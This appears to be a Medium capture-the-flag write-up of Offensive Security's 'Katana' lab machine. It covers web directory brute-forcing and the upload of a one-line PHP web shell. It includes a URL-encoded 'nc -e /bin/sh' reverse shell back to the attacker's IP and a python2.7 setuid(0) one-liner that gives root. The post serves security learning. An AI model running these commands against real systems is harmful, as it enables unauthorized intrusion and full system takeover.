KATANA has been PWNED!!!! — Offensive Security

This is one of the proving ground from Offensive Security and marked as easy machine. So let’s pwn this machine

ENUMERATION

Starting of with scanning with open service and ports

Highlighting all these is a good practice ;-) . So found some ports and numerous http services. So as there are numerous, so using nikto will be my last approach.

Brute forcing web directories on different ports.

gobuster.txt is for port 80

gobuster8088.txt is for port 8088

gobusterdir.txt is for dir brute on port 80

gobusterdir8088.txt is for dir brute on port 8088

And surprisingly I found upload.html and then without furthur ado i used one line php payload and waited for 1 minute as per the web page instructions. During the initial recon there were many http services running, I then hop over to port 8715 with uploaded file location url i.e Suppose the uploaded file name is cmd.php, so the encoded payload will be :

http%3A%2F%2F192.168.100.131%3A8715%2Fkatana_cmd.php%3Fcmd%3Dnc%20-e%20%2Fbin%2Fsh%20192.168.100.128%209999

As my shell was listening on this port and YES!!! we’re in!.

Privilege Escalations

Enumerating the target machine after gaining access, I looked for system capabilities and found empty capability (ep) over suid is given python2.7 for www-data that means all privilege is assigned to www-data for that program, therefore taking advantage of this permission I can escalate into high privilege from low privilege shell using the command below.

python2.7 -c 'import pty;import os;os.setuid(0);pty.spawn("/bin/dash")'

And we are now root!!! and found a flag ;-)

— — — — — — — — — — — — — — — — — — — — — — — -

Let me know if you face any issues

================

That’s all for now,

Until Next Time,

You are Awesome!!!

— — — — — — — — — — — — —

--

--

--

Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

HacktivityCon 2021 CTF Writeup

HacktivityCon 2021 CTF

How do I recover my SafeMoon Wallet?

New Magpi-Dropbox Photo Integration

Magpi Dropbox photo integration

New paradigm of gig workers creates new data security risks

3 Simple Ways For Web Scraping Without Getting Blocked

ANALYZING THE OWASP TOP10

LabREynth 2017 Binary Challenge 1 — MyFirstMalware.exe

Hack the Box: Legacy Write-up

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

Reverse engineering musings: WhisperGate Stages 1 & 2

Things I learned this week about Log4JShell Vulnerability

8 AppSec Metrics You Should Be Monitoring

Revolutionizing Data Security by Design